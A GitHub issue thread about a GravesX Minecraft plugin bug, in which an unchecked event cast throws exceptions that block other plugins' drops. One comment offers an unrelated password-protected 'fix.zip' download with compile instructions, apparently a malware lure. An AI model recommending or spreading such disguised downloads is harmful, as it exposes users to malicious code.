### ISSUE TITLE
[Bug] Unhandled exceptions in EntityDeathListener

### ISSUE THREAD

**Issue by shantek** [Legoman99573/GravesX#33]
### Minecraft Server Version

1.21-2256-de2e7a7 (MC: 1.21) Purpur

### `/graves dump` output

Dumped: https://mclo.gs/JF6Mkq6

### Summary of the bug

When running graves along side a plugin that modifies entity drops (for example a pug, dropping a head), the unhandled exceptions in EntityDeathListener prevent other plugins from handling the event and dropping the custom head. Removing the Graves plugin on my test server allows those plugins to process the event, adding GravesX back stops the event from being processed again.

### Steps to Reproduce

- Add Heads plus to the server: https://www.spigotmc.org/resources/headsplus-%C2%BB-1-15-2-1-21-x.40265/ - with 100% drop rate.
- Add GravesX to the server.
- Kill a mob, no head drops.
- Remove GravesX from the server, observe that heads begin to drop again

### Expected Result

All exceptions should be handled correctly and allow other plugins to handle the event. 

### Actual Result

Unhandled exceptions stop prevents any other plugin from processing the event, preventing any custom drops on the server. 

### Additional Information

Issue: Casting EntityDeathEvent to PlayerDeathEvent without verifying if the event actually involves a player.
Exception: If a non-player entity dies, casting the event to PlayerDeathEvent will throw a ClassCastException.
Impact: This exception will disrupt the event handling flow, potentially affecting other plugins and causing unexpected behavior.

### Version Confirmation

- [X] I confirm that the issue is present in the latest GravesX Spigot Release or Development Builds.
- [X] If I use development builds in a production environment, I am aware that I will not receive support if I lose data.
- [X] If the issue is caused by another fork or Graves 4.9, then I expect to not get support here and my issue will be closed.
- [X] I am not running an outdated version of GravesX when reporting
- [X] If I use any sort of Plugin Manager/Management plugin that I will not receive support. (Plugin Managers causes alot of behavioral issues and causes more problems than it resolves)
- [ ] I am not just clicking checkboxes randomly without reading them. If I don't check this, then I did read everything.

**Comment by SagarChandra07** [comment]
I think this will help you.
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive password: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by Legoman99573** [comment]
Switched to monitor. Should resolve that issue.

**Comment by shantek** [comment]
@Legoman99573  Just confirming if this has been included in any of the builds pushed out over the last week. Currently running the latest build and it's still causing issues.

**Comment by Legoman99573** [comment]
Update purpur and let me know if the same issue occurs.
